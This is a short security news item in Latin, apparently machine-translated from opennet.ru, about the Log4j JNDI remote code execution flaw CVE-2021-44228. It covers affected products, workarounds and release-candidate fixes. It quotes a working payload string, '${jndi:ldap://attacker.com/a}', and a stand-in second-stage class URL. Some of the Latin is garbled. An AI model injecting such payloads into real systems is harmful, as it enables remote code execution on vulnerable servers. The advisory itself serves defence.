In Apache Log4j, popularis compages ad colligationem in applicationibus Javae ordinandis, vulnerabilitas critica notatus est qui permittit ut codicem arbitrarium exsecutioni mandari cum forma peculiariter formata in "{jndi:URL}" ad log scriptum est. Oppugnatio in applicationibus Javae explicari potest, quae valores logi ab externis fontibus accepti sunt, exempli gratia, cum bonas difficultates in errore nuntia ostendentes.
Notatur fere omnia incepta machinarum utentes ut Apache Struts, Apache Solr, Apache Druid vel Apache Flink afficiuntur problema, in quibus Vapor, Apple iCloud, Minecraft clientes et servientes. Exspectatur vulnerabilitas posse ducere ad fluctuationem impetus in applicationibus corporatum in corporatum, repetens historiam passitudinum criticarum in compage Apache Struts, quae, secundum asperam aestimationem, in applicationibus interretialibus 65% Fortunae adhibetur. Societates 100 comprehendo conatus ad lustrandum retiacula pro vulnerabilibus systematibus.
Problema aggravatur ex eo quod opus operis iam divulgatum est, sed figit ramulos stabilis nondum compilatos. CVE identifier nondum assignatus est. Fix solum in log4j-2.15.0-rc1 test ramo comprehenditur. Cum habemus circumligationem ad vulnerabilitatem claudendam, suadetur ut log4j2. formatMsgNoLookups parametri ad verum instituat.
Problema causabatur ex eo quod log4j subsidia speciales larvas "{}" in lineis output ad truncum disponendas sustinet, in quibus JNDI (Java Nameing and Directory Interface) quaestionibus exsecutioni mandari potuit. Impetum vulnerat ad filum transeunte substitutione "${jndi:ldap://attacker.com/a}", in processus qui log4j mittet petitionem LDAP pro via ad Iava classis ad oppugnatorem.com server . Iter a servo oppugnatoris redditum (exempli gratia http://second-stage.attacker.com/Exploit.class) onerari et exsecutioni mandari in contextu processus hodierni, qui percussorem permittit in codice arbitrario fungi systema cum iuribus applicationis hodiernae.
Addendum 1: vulnerabilitas identifier CVE-2021-44228 designata est.
Addendum 2: Via ad praetermittendum tutelae additae per log4j-2.15.0-rc1 emissio notata est. Nova renovatio, log4j-2.15.0-rc2, pleniori praesidio contra vulnerabilitatem proposita est. Codex mutationem elucidat cum absentia terminationis abnormis in casu utendi JNDI URL non recte formato.
Source: opennet.ru